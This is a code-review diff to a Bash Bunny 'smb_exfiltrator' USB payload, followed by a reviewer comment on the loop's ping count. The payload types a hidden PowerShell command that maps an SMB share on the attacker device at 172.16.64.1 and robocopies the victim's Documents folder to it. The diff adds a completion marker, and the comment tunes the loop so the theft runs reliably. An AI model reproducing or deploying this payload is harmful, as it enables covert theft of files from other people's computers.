payloads/library/smb_exfiltrator/payload.txt

```diff
@@ -35,21 +35,22 @@ fi
 
 # HID STAGE
 # Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
-# Once found, initiates file copy and exits
+# Once found, initiates file copy and once finished copying files it creates a file called 'd'.
+# Then exits.
 LED R G
 ATTACKMODE HID
 QUACK GUI r
 QUACK DELAY 500
-QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
+QUACK STRING "powershell -WindowStyle Hidden \"while (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; New-Item \\\172.16.64.1\e\.d; exit }\""

```

Comment:
-count 1 needs to be -count 99 otherwise the while loop ends after one ping. The default is 4 and in my testing this is sufficient so -count could be omitted all together - but in case a machine takes longer than others to enumerate the Ethernet adapter it should have a conservative value.